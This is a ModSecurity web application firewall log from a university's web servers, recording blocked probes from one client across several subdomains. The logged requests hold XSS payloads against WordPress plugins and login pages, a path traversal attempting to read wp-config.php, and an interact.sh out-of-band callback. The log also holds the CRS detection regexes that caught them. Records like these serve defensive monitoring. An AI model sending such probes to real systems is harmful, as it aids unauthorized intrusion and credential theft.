[Tue Aug 29 11:55:58.738890 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:p: <img src onerror=alert(/XSS/)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XsCo-f0AAAq@scMAAAAM"]
[Tue Aug 29 11:55:58.739920 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:p: <img src onerror=alert(/XSS/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XsCo-f0AAAqSw3MAAAAN"]
[Tue Aug 29 11:55:58.740192 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:p: <img src onerror=alert(/XSS/)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XsCo-f0AAAqTv0sAAAAa"]
[Tue Aug 29 11:55:58.761201 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:p: <img src onerror=alert(/XSS/)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XsCo-f0AAAq5@JAAAAAK"]
[Tue Aug 29 11:55:58.781193 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XsCo-f0AAArB1tcAAAAV"]
[Tue Aug 29 11:55:59.529216 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:p: <img src onerror=alert(/XSS/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16X8Co-f0AAAq5@JEAAAAK"]
[Tue Aug 29 11:55:59.658305 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16X8Co-f0AAAq@scgAAAAM"]
[Tue Aug 29 11:55:59.834626 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16X8Co-f0AAArC7cwAAAAW"]
[Tue Aug 29 11:55:59.894977 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16X8Co-f0AAArB1twAAAAV"]
[Tue Aug 29 11:56:00.087484 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:p: <img src onerror=alert(/XSS/)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16YMCo-f0AAArB1t4AAAAV"]
[Tue Aug 29 11:56:00.155657 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16YMCo-f0AAAq@sdAAAAAM"]
[Tue Aug 29 11:56:00.157544 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16YMCo-f0AAArB1t8AAAAV"]
[Tue Aug 29 11:56:00.160736 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16YMCo-f0AAAqSw3wAAAAN"]
[Tue Aug 29 11:56:00.544584 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YMCo-f0AAAqSw34AAAAN"]
[Tue Aug 29 11:56:00.620297 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YMCo-f0AAAqSw4AAAAAN"]
[Tue Aug 29 11:56:00.735569 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16YMCo-f0AAApbUtMAAAAh"]
[Tue Aug 29 11:56:01.530619 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAAq5@KMAAAAK"]
[Tue Aug 29 11:56:01.538329 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAApa-Q4AAAAg"]
[Tue Aug 29 11:56:01.539716 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YcCo-f0AAAqeFgQAAAAx"]
[Tue Aug 29 11:56:01.539903 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAApbUtUAAAAh"]
[Tue Aug 29 11:56:01.553104 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YcCo-f0AAAq5@KQAAAAK"]
[Tue Aug 29 11:56:01.564970 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAAq@sdUAAAAM"]
[Tue Aug 29 11:56:01.613541 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAArB1uYAAAAV"]
[Tue Aug 29 11:56:01.616314 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YcCo-f0AAAqTv1oAAAAa"]
[Tue Aug 29 11:56:01.643108 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAAqeFggAAAAx"]
[Tue Aug 29 11:56:01.645452 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAAqSw4gAAAAN"]
[Tue Aug 29 11:56:01.648757 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAApbUtYAAAAh"]
[Tue Aug 29 11:56:01.654941 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22><svg/o found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAApa-RMAAAAg"]
[Tue Aug 29 11:56:01.655737 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAAqTv1wAAAAa"]
[Tue Aug 29 11:56:01.664130 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YcCo-f0AAAqeFgkAAAAx"]
[Tue Aug 29 11:56:02.541094 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAAqeFgsAAAAx"]
[Tue Aug 29 11:56:02.569110 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YsCo-f0AAAqY6OoAAAAr"]
